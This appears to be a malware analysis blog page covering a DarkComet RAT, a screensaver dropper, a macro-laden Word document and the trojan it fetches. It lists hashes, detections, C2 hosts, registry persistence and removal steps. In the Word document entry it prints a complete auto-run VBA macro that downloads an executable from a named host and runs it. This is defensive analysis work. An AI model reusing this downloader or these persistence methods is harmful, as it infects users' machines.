Skip to content

Malware analysis

looking for the perfect virus
ForceOp.exe

ForceOp.exe

File name: ForceOp.exe
MD5: 2b006dd5d496c7ad7040d5c8efab0240
SHA-1: 6b4070a5ee59dbc30a71d766442f52fbad6de4ab
Size: 1.82 MB (1,917,440 bytes)

details

details

Antivirus detection:

MD5: 2b006dd5d496c7ad7040d5c8efab0240
Verified By NoDistribute: http://NoDistribute.com/result/4YgI3DlXP7M2oJA9

AVG Free:Trojan horse Autoit_c.ATDC
Avast:Win32:Malware-gen
AntiVir (Avira):DR/AutoIt.Gen2
BitDefender:Trojan.GenericKD.1716380
Clam Antivirus:Win.Trojan.11477628
COMODO Internet Security:Malware@fya0u6p5xw7s
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security:Trojan.GenericKD.1716380
G Data:Trojan.GenericKD.1716380
IKARUS Security:Backdoor.Win32.DarkKomet
Kaspersky Antivirus: Clean
McAfee:Artemis!2B006DD5D496
MS Security Essentials: Clean
Norman:winpe/Troj_Generic.UOKHC
Norton Antivirus: Clean
Panda Security: Clean
A-Squared:Trojan.GenericKD.1716380 (B)
Quick Heal Antivirus:Backdoor.DarkKomet.g5
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus:INFECTED [Trojan.Autoit.NPP]
Ad-Aware:Trojan.GenericKD.1716380
BullGuard:Trojan.GenericKD.1716380
FortiClient: Clean
K7 Ultimate:Trojan ( 00492e361 )
NANO Antivirus:Trojan.Win32.DarkKomet.dbaajp
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus:Trojan.264FEF29B6FC0C72
VIPRE:Trojan.Win32.Generic=21BT

process:
ForceOp.exe
IPOR.exe (C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe)

network activity:
slothyster.no-ip.biz 1604

persistence:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe c:\documents and settings\administrator\my documents\jeva\ipor.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
Apple Posh C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe
JervaC:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Apple Posh C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

new files:
C:\Documents and Settings\Administrator\Application Data\dclogs\
2014-07-17-5.dc

C:\Documents and Settings\Administrator\My Documents\JEVA\
IPOR.exe MD5: 2b006dd5d496c7ad7040d5c8efab0240

malware type: Darkcomet, keylogger, rat, info-stealer

removal:
kill process ForceOp.exe/IPOR.exe
remove persistence entry from registry
delete C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

Avis.de.Paiement.scr

Avis.de.Paiement.scr

File name: Avis.de.Paiement.scr
MD5: 66dcf2e32aa902e2ffd4c06f5cb23b43
SHA-1: 3a2bbef2c1656f763ab74b35446a605aef72e52c

CompanyName: Arcom
FileDescription: Arcoms Application
FileVersion: 1, 1, 2, 1
InternalName: Arcom
LegalCopyright: Copyright Dejaneyro (C) 2013
LegalTrademarks:
OriginalFilename: Arcoms.exe
ProductName: Arcoms Application
ProductVersion: 1, 1, 2, 1

Antivirus detection:

Scan Result: 1/34
Verified By NoDistribute: http://NoDistribute.com/result/p6qdWSf0vTsr8

AVG Free: Clean
Avast:Win32:Evo-gen [Susp]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: Clean
IKARUS Security: Clean
Kaspersky Antivirus: Clean
McAfee: Clean
MS Security Essentials: Clean
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

-self delete
process:
inject into msiexec.exe C:\WINDOWS\system32\msiexec.exe

new files:
C:\Documents and Settings\All Users\
msbbfvw.exe md5 66dcf2e32aa902e2ffd4c06f5cb23b43

network:
disk57.com/gate.php
User-Agent: Mozilla/4.0

persistence:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
1080726116 REG_SZ C:\DOCUME~1\ALLUSE~1\msbbfvw.exe

remove instructions:
suspend explorer.exe and msiexec.exe
kill explorer.exe and msiexec.exe
go to c:\Documents and Settings\All Users\

attrib -s -h  msbbfvw.exe

delete msbbfvw.exe
use sysinternals autoruns to delete persistence entry

File name: Order_230614.Doc
MD5: 08c458d4a35d2c2dbd61ea1ed585378c
SHA-1: 3fbdecab968c1dd3619ff0d34c006606b461a509
Size: 46.5 KB (47,616 bytes)

Order_230614.doc

Order_230614.doc

Macros warning

Macros warning

Antivirus detection:

File Name: Order_230614.Doc
File Size: 46.5 KB
Scan Date: 2014-06-25
Scan Result: 13/34

MD5: 08c458d4a35d2c2dbd61ea1ed585378c
Verified By NoDistribute: http://NoDistribute.com/result/KSqv8wZ7efyXpDO

AVG Free: Clean
ArcaVir: Clean
Avast: Clean
AntiVir (Avira): Clean
BitDefender:Trojan.Downloader.JQUA
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web:W97M.DownLoader.26
eTrust-Vet:Tnega.XASO!suspicious
F-PROT Antivirus: Clean
F-Secure Internet Security:Trojan-Downloader:W32/Agent.DUZS
G Data:Trojan.Downloader.JQUA
IKARUS Security:Trojan-Downloader.W97M.Adodb
Kaspersky Antivirus:Trojan-Downloader.MSWord.Agent.ac
McAfee: Clean
MS Security Essentials:TrojanDownloader:W97M/Adobdocro.A
Norman: Clean
Norton Antivirus:Trojan.Mdropper
Panda Security: Clean
A-Squared:Trojan-Downloader.MsWord.Macdrop (A)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos:WM97/Agent-AFRS
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard:Trojan.Downloader.JQUA
FortiClient:MSOffice/Agent.E!tr
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
Twister Antivirus: Clean
VIPRE: Clean

Extracted Macros:

Sub Auto_Open()
    h
End Sub
 
Sub h()
 
Set oShell = CreateObject("WScript.Shell")
strH = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
Dim sDir: sDir = strH & "\q"
 
 
 
 
Dim oHTTP: Set oHTTP = CreateObject("MSXML2.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
xHttp.Open "GET", "http://barniefilm1996.ru/info.exe", False
xHttp.Send
 
With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile strH & "\q\q.com", 2
End With
 
 
Call m(sDir)
 
End Sub
 
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
 
 
 
Function m(str11)
    Dim fso, f, fc, f1, strF, intFiles
    Dim WshShell
 
    Set WshShell = CreateObject("WScript.Shell")
 
    strF = ""
 
    Set fso = CreateObject("Scripting.FileSystemObject")
    If (fso.FolderExists(str11)) Then
        Set f = fso.GetFolder(str11)
        Set fc = f.Files
 
 
        For Each f1 In fc
        Dim fR
        fR = str11 & "\" & f1.Name
        WshShell.Run Chr(34) & fR & Chr(34), 1, True
    Next
 
        Set f1 = Nothing
        Set fc = Nothing
        Set f = Nothing
 
 
    End If
    Set fso = Nothing
End Function

File name: info.exe
MD5: 49ee7488e5a3d6d72041b94575a649bc
SHA-1: 78777b3675402c046355239f41fdfdf5e8e89b67
Size: 281 KB (288,379 bytes)

info.exe

info.exe

CompanyName: Speedy Softwares
ProductVersion: 8
FileVersion: 8, 2, 6
InternalName: Ohy
LegalTrademarks: Gap Didihu Awusuki Ikulav Yqesysy Beje Nyzaze Caticot Umuno Nyh
LegalCopyright: 1995
OriginalFilename: Geqpeevn.exe
ProductName: Kofuju
FileDescription: Pikusy Aqugik Ewimy
-self delete

Antivirus detection:

File Name: info.exe_
File Size: 281.62 KB
Scan Date: 2014-06-25
Scan Result: 18/34

MD5: 49ee7488e5a3d6d72041b94575a649bc
Verified By NoDistribute: http://NoDistribute.com/result/F9wl6vdLafb

AVG Free:Trojan horse Agent4.BXRH
ArcaVir: Clean
Avast:Win32:Malware-gen
AntiVir (Avira):TR/Agent.288379
BitDefender:Trojan.GenericKD.1728294
Clam Antivirus: Clean
COMODO Internet Security:Malware@1i1va7v5h3yae
Dr.Web:Trojan.KeyLogger.25202
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security:Trojan.GenericKD.1728294
G Data:Trojan.GenericKD.1728294
IKARUS Security:Trojan.Agent
Kaspersky Antivirus:Trojan.Win32.Agent.icpx
McAfee:Artemis!49EE7488E5A3
MS Security Essentials: Clean
Norman:winpe/Agent.BDRDH
Norton Antivirus:Trojan.Zbot
Panda Security: Clean
A-Squared:Trojan.Win32.Agent (A)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard:Trojan.GenericKD.1728294
FortiClient:W32/Agent.WBC!tr
K7 Ultimate:Trojan ( 0049bb751 )
NANO Antivirus: Clean
Panda CommandLine: Clean
Twister Antivirus: Clean
VIPRE:Trojan.Win32.Generic=21B

process:
osuninst.exe (C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe)
rasdial.exe (C:\Documents and Settings\Administrator\Local Settings\Temp\rasdial.exe)

new files:
C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\
osuninst.exe MD5 dacc19c5ea1596b2550b81b1c9f5bab1

C:\Documents and Settings\Administrator\Local Settings\Temp\
rasdial.exe MD5 52303dc6f013ef3b0c37bba6817424f2

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\
osuninst.lnk

network:
www.livejournal.com/search/?how=tm&area=default&q=8199291E1084C21B HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

registry:
HKEY_CURRENT_USER\Control Panel\Desktop\
SCRNSAVE.EXE REG_SZ “C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe”

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\
AutoRun REG_SZ “C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
Run REG_SZ “C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe”

persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
osuninst REG_SZ “C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
osuninst REG_SZ “C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe”

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\
osuninst.lnk